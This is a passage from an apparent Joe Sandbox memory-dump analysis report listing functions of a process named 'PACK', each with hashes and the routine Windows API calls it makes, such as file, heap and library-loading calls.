                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                            • Opcode ID: 0f79ddaeca8bed68c3c49e74000ed0bc97e5d98405b25acba6b4df5aef0d35d4
                                                                                                                                                                            • Instruction ID: 75b8b93fe2185113c1ec8a405262095b8c8b60b82e4ee29ebd9e454e1bdc850c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f79ddaeca8bed68c3c49e74000ed0bc97e5d98405b25acba6b4df5aef0d35d4
                                                                                                                                                                            • Instruction Fuzzy Hash: B70180717042006BD7349E69EC8876AB6DBAB84324F19453FB182C2784CAB5D948D621
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(000000FF,?,?,?), ref: 00FD9957
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00FD9964
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                            • Opcode ID: e7b50c24b20409c705866b538c437279c42922a68aad3c3e1f2997847b2b9e28
                                                                                                                                                                            • Instruction ID: defd0cc55a409a811446275123b57f17632c8760122c8f16644e80e1e4395bbb
                                                                                                                                                                            • Opcode Fuzzy Hash: e7b50c24b20409c705866b538c437279c42922a68aad3c3e1f2997847b2b9e28
                                                                                                                                                                            • Instruction Fuzzy Hash: 8201B5726082159B8B199EA58CA46BE775BAF4133070D421FF9268B351DAB1DC01F762
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00FF7B99
                                                                                                                                                                              • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,?,010100E0,00FDCB18,?,?,?,?,?,?), ref: 00FF7BD5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocAllocate_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2447670028-0
                                                                                                                                                                            • Opcode ID: f9a560fa517fb9256f9fd654bf329d9f36b88568ec00cf19c81fd0dae611aeaf
                                                                                                                                                                            • Instruction ID: 335fe35aa12d0a0f53f5ac437922179a91f876e25c343bb20b1f04f361779b3b
                                                                                                                                                                            • Opcode Fuzzy Hash: f9a560fa517fb9256f9fd654bf329d9f36b88568ec00cf19c81fd0dae611aeaf
                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF0623290931D6ADB313A25AC41F7FF759AFC3BB0B150156FF54A61B8DB28D800B1A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00FE0581
                                                                                                                                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00FE0588
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1231390398-0
                                                                                                                                                                            • Opcode ID: f39e7c3752ca2a9aed68098070e64a70034e63be15575158fa48ef9e8d4cbc18
                                                                                                                                                                            • Instruction ID: 5a2daea63843e7fcab993edb6a1ff12301b929adcfdf7a7e225d05835ee335e0
                                                                                                                                                                            • Opcode Fuzzy Hash: f39e7c3752ca2a9aed68098070e64a70034e63be15575158fa48ef9e8d4cbc18
                                                                                                                                                                            • Instruction Fuzzy Hash: 74E09B32E10345A79F258AE598059AB73ADDA48311F14517AB942D3300FD75DD415FA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA143
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA174
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: dc481d476bfff1823c2254caab360f36e00a3ceaaa1e7ea0f1ae963b57dd1e30
                                                                                                                                                                            • Instruction ID: 5823058a0a654b8c65e08fa14006de5956ddaf9230738bba16b7b2d5a63bb40f
                                                                                                                                                                            • Opcode Fuzzy Hash: dc481d476bfff1823c2254caab360f36e00a3ceaaa1e7ea0f1ae963b57dd1e30
                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0A031141219ABDF129F60DC44BEA376EAB04391F488052BC8C86256DB32CD99FF90
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText_swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3011073432-0
                                                                                                                                                                            • Opcode ID: 12f763d07d89eca883834af105533b47eb2b920ee2ba59703e72e72daa64dc3b
                                                                                                                                                                            • Instruction ID: 3df2d4297244b2c13b0ffeacf21dd36467d88379a5704d1f52844462af738475
                                                                                                                                                                            • Opcode Fuzzy Hash: 12f763d07d89eca883834af105533b47eb2b920ee2ba59703e72e72daa64dc3b
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0EC315043C82ADB21ABB1DC07F993B1D9704741F040496BA0452192D57F6A21A772
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00FD9648,?,?,00FD94A3), ref: 00FD9E29
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00FD9648,?,?,00FD94A3), ref: 00FD9E57
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                            • Opcode ID: 6bc61a865eb9881101cf40a128ef79a7ef17b5d1b71fc421d01777ee89ba61a3
                                                                                                                                                                            • Instruction ID: 6db33c4cd417c6b3ce46e744d8a30b426905b9b1328f4a630b0caf3b8a3fcbd8
                                                                                                                                                                            • Opcode Fuzzy Hash: 6bc61a865eb9881101cf40a128ef79a7ef17b5d1b71fc421d01777ee89ba61a3
                                                                                                                                                                            • Instruction Fuzzy Hash: 09E02230540208ABDB12DF60DC48FE9335DAB08391F888062B888C2242DBB2CC98FA60
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00FD9E74,?,00FD74F7,?,?,?,?), ref: 00FD9E90
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,00FD9E74,?,00FD74F7,?,?,?,?), ref: 00FD9EBC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: fdccbad881748667340aafe867572e30e344cae662eeb6d5c10fbb7ca19874a7
                                                                                                                                                                            • Instruction ID: c528487c4fbe65d3443944ad04d12a027a69b089a12eb624933b70e0c9d69a32
                                                                                                                                                                            • Opcode Fuzzy Hash: fdccbad881748667340aafe867572e30e344cae662eeb6d5c10fbb7ca19874a7
                                                                                                                                                                            • Instruction Fuzzy Hash: 29E0653190022897DB21EA689C04BD977599B083A1F044262FD94D3285D6759D459BE0
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1175261203-0
                                                                                                                                                                            • Opcode ID: 3fe0d3aa02d186d882eba167e9e8de56483ecee7002a6c155aff0b1d90a4da7b
                                                                                                                                                                            • Instruction ID: b2e059278cdfd2ae40c6afc27ff442a4770b1d4b910320e30f69efb57cfab214
                                                                                                                                                                            • Opcode Fuzzy Hash: 3fe0d3aa02d186d882eba167e9e8de56483ecee7002a6c155aff0b1d90a4da7b
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DE0487690025C6BDB21DB95DC08FEA776DEF0C391F4800A6B948D2105DA79D944DBF1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,01001161,000000FF), ref: 00FE9B31
                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,01001161,000000FF), ref: 00FE9B36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856339756-0
                                                                                                                                                                            • Opcode ID: 20baa78c2fe2d0ac6901194560b55589ab5b3affd01e92f73d46060e6b2dffc2
                                                                                                                                                                            • Instruction ID: a16876bb9ae2581a3813f915ab6c96951c1ed3dbc462a1e8f6f7b74231113dd4
                                                                                                                                                                            • Opcode Fuzzy Hash: 20baa78c2fe2d0ac6901194560b55589ab5b3affd01e92f73d46060e6b2dffc2
                                                                                                                                                                            • Instruction Fuzzy Hash: 84E04F32544684EFC721DF88DC46B56B7E8FB49B20F004769F81983B54CB796800CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FF281A: try_get_function.LIBVCRUNTIME ref: 00FF282F
                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF1744
                                                                                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FF174F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 806969131-0
                                                                                                                                                                            • Opcode ID: 1c7c4f13bb8cd5a44a2e04336aef757963c21bc76331c5aa449d8d90defe3b7a
                                                                                                                                                                            • Instruction ID: 8e8dd0097fa0e56fe17fa31c950c8be60821507bfbc785dea6dece7fa33b7e3d
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7c4f13bb8cd5a44a2e04336aef757963c21bc76331c5aa449d8d90defe3b7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 43D0A72794430D844E0036B46C1257527487D11BB0BA04747F324DE0F2EF288005B525
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemShowWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3351165006-0
                                                                                                                                                                            • Opcode ID: fa25da9112a999f7c026a353729bd0c9f17e20b5737afea6e29949e735e95d34
                                                                                                                                                                            • Instruction ID: 357c4d3993a33d0958b0c61eb6a819c68c95b48b5b7dd48624f705fe588b9bd3
                                                                                                                                                                            • Opcode Fuzzy Hash: fa25da9112a999f7c026a353729bd0c9f17e20b5737afea6e29949e735e95d34
                                                                                                                                                                            • Instruction Fuzzy Hash: 55C01272058200BECB021BF0DC09D3EBBA8ABA4212F04C90CB0E5C00A8C63EC010DB21
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00FD12A2
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00FD12A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherItemUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4250310104-0
                                                                                                                                                                            • Opcode ID: 4d60f86c37461706cdaf0d1e7058abfc2f38ba7fde40c1167b226509a9d052e5
                                                                                                                                                                            • Instruction ID: d784d56e5553eb83d95c75679c3e2953ffb76cdddfee372218dca4d2b0c58217
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d60f86c37461706cdaf0d1e7058abfc2f38ba7fde40c1167b226509a9d052e5
                                                                                                                                                                            • Instruction Fuzzy Hash: E3C04C76408240BFCB125BE09808D3FBFAAAB98312F04C80DB1E580028C73A8510DB21
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 7774b5247e718b8d778ee8e46b15c6b54c5262b9a4d4b0e1dee9b9468aa8539f
                                                                                                                                                                            • Instruction ID: 64f098641255dfe41087d63e3a42e1fa985690e6cf813b04e0ef51d43eda080d
                                                                                                                                                                            • Opcode Fuzzy Hash: 7774b5247e718b8d778ee8e46b15c6b54c5262b9a4d4b0e1dee9b9468aa8539f
                                                                                                                                                                            • Instruction Fuzzy Hash: D2B1CD70A04646BFEB28CF78C484BB9FBA7BF05314F18025BE45593381D729A964EB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD81C9
                                                                                                                                                                              • Part of subcall function 00FD137D: __EH_prolog.LIBCMT ref: 00FD1382
                                                                                                                                                                              • Part of subcall function 00FD137D: new.LIBCMT ref: 00FD13FA
                                                                                                                                                                              • Part of subcall function 00FD1973: __EH_prolog.LIBCMT ref: 00FD1978
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 00b65c27536f93b5c17ae57e0dff640d174d95e5b7825e5c10e504351a4a4402
